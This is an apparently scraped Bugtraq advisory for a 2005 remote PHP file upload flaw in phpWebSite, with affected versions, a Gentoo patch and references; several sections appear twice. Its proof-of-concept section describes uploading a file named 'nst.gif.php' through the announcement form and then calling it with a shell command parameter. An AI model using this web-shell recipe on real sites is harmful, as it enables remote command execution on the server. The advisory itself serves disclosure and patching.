PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
BID:12653
Info
PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
| Bugtraq ID: | 12653 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2005 12:00AM |
| Updated: | Feb 24 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to tjomka <[email protected]>. |
| Vulnerable: |
phpWebsite phpWebsite 0.10 phpWebsite phpWebsite 0.9.3 -4 phpWebsite phpWebsite 0.9.3 -3 phpWebsite phpWebsite 0.9.3 -2 phpWebsite phpWebsite 0.9.3 -1 phpWebsite phpWebsite 0.9.3 phpWebsite phpWebsite 0.8.3 phpWebsite phpWebsite 0.8.2 phpWebsite phpWebsite 0.7.3 Gentoo Linux |
| Not Vulnerable: | |
Discussion
PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement.
A remote attacker may exploit this condition to execute arbitrary PHP code in the context of the hosting web server process.
This vulnerability is reported to affect phpWebSite versions up to an including version 0.10.0.
phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement.
A remote attacker may exploit this condition to execute arbitrary PHP code in the context of the hosting web server process.
This vulnerability is reported to affect phpWebSite versions up to an including version 0.10.0.
Exploit / POC
PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
The following example is available:
http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3
1. Fill all inputs
2. in Image: select nst.gif.php
press Save.
Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la
The following example is available:
http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3
1. Fill all inputs
2. in Image: select nst.gif.php
press Save.
Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la
Solution / Fix
PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
Solution:
Gentoo has released an advisory (GLSA 200503-04) and an updated eBuild to address this vulnerability. Gentoo users that are running the affected software may apply the update by issuing the following sequence of commands as a superuser:
emerge --sync
emerge --ask --oneshot --verbose ">=www-apps/phpwebsite-0.10.0-r2"
Solution:
Gentoo has released an advisory (GLSA 200503-04) and an updated eBuild to address this vulnerability. Gentoo users that are running the affected software may apply the update by issuing the following sequence of commands as a superuser:
emerge --sync
emerge --ask --oneshot --verbose ">=www-apps/phpwebsite-0.10.0-r2"
References
PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability
References:
References:
- phpWebsite Homepage (phpWebsite)
- AW: phpWebSite-0.10.0_exploit ([email protected])
- phpWebSite-0.10.0_exploit (tjomka
)